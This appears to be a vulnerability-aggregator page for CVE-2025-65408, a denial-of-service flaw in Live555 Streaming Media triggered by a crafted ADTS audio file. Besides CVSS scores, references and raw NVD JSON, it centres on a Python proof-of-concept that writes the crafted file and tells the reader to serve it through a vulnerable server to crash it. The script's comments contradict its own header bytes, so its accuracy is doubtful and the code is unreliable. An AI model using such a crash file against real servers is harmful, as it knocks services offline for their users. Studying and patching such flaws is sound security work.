CVE-2025-65408

Description

A NULL pointer dereference in the ADTSAudioFileServerMediaSubsession::createNewRTPSink() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS file.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:* - VULNERABLE

Live555 Streaming Media v2018.09.02及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65408 PoC - Live555 NULL Pointer Dereference in ADTSAudioFileServerMediaSubsession
This PoC generates a crafted ADTS file that triggers NULL pointer dereference
in createNewRTPSink() function, causing denial of service.
"""

import struct
import sys

def create_crafted_adts_file(filename, corrupt_frame=False):
    """
    Generate a crafted ADTS file to trigger CVE-2025-65408
    
    ADTS Header Structure (7 bytes):
    - Sync word: 12 bits (0xFFF)
    - MPEG-4 LC: 1 bit (0)
    - Layer: 2 bits (00)
    - Protection absent: 1 bit (1 = no CRC)
    - Profile: 2 bits
    - Sampling frequency index: 4 bits
    - Private bit: 1 bit
    - Channel configuration: 3 bits
    - Original/Copy: 1 bit
    - Home: 1 bit
    - Copyright identification bit: 1 bit
    - Copyright identification start: 1 bit
    - Frame length: 13 bits
    - Adts buffer fullness: 11 bits
    - Number of AAC frames: 2 bits
    """
    
    adts_header = bytearray()
    
    # Sync word (0xFFF) + MPEG-4 LC + Layer + Protection absent
    # First 2 bytes: 0xFFF0 (1111 1111 1111 0000)
    # 0xFFF = sync word, 0x0 = MPEG-4 LC (1 bit) + Layer (2 bits) + Protection absent = 1
    if corrupt_frame:
        # Corrupt frame to trigger NULL pointer dereference
        adts_header.append(0xFF)
        adts_header.append(0xF0)  # Invalid config
    else:
        adts_header.append(0xFF)
        adts_header.append(0xF1)  # Valid sync + MPEG-4 LC LC + no CRC
    
    # Profile (2 bits) + Sampling frequency index (4 bits) + Private (1 bit)
    # Using AAC LC profile (00) and 44100 Hz sampling (4 = 0x04)
    profile_and_samp = (0x00 << 6) | (0x04 << 2) | 0x00
    adts_header.append(profile_and_samp)
    
    # Channel configuration (2 bits) + Original/Copy + Home + Copyright bits
    channel_config = (0x02 << 6) | (0 << 2) | (0 << 1) | 0
    adts_header.append(channel_config)
    
    # Copyright identification + Frame length high (5 bits)
    frame_length_high = 0x00
    adts_header.append(frame_length_high)
    
    # Frame length low (8 bits) - total frame length including header
    frame_length_low = 0x15  # Minimal frame length
    adts_header.append(frame_length_low)
    
    # ADTS buffer fullness (11 bits) + Number of AAC frames (2 bits)
    buffer_fullness = 0x7FF  # Variable bit rate
    aac_frames = 1
    adts_footer = (buffer_fullness << 6) | aac_frames
    adts_header.append((adts_footer >> 8) & 0xFF)
    adts_header.append(adts_footer & 0xFF)
    
    # Add minimal frame data to make file parseable
    frame_data = b'\x00' * 200
    
    # Write crafted ADTS file
    with open(filename, 'wb') as f:
        f.write(adts_header)
        f.write(frame_data)
    
    print(f"[+] Crafted ADTS file created: {filename}")
    print(f"[+] File size: {len(adts_header) + len(frame_data)} bytes")
    return filename

def main():
    print("=" * 60)
    print("CVE-2025-65408 PoC - Live555 NULL Pointer Dereference")
    print("=" * 60)
    
    filename = "crafted_cve_2025_65408.adts"
    create_crafted_adts_file(filename, corrupt_frame=True)
    
    print("\n[*] Usage: Serve this file via vulnerable Live555 server")
    print("[*] Or open with media player that uses Live555 library")
    print("[*] Expected result: Server crash with NULL pointer dereference")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65408
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65408
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65408/
[4] VulDB https://vuldb.com/cve/CVE-2025-65408
[5] https://github.com/rgaufman/live555
[6] https://shimo.im/docs/VMAPLVLp57SJ92Ag

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65408", "sourceIdentifier": "[email protected]", "published": "2025-12-01T17:15:50.407", "lastModified": "2025-12-23T13:43:11.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL pointer dereference in the ADTSAudioFileServerMediaSubsession::createNewRTPSink() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:*", "matchCriteriaId": "C9F01989-4E5A-42B7-8EF7-74E3A5335754"}]}]}], "references": [{"url": "https://github.com/rgaufman/live555", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://shimo.im/docs/VMAPLVLp57SJ92Ag", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}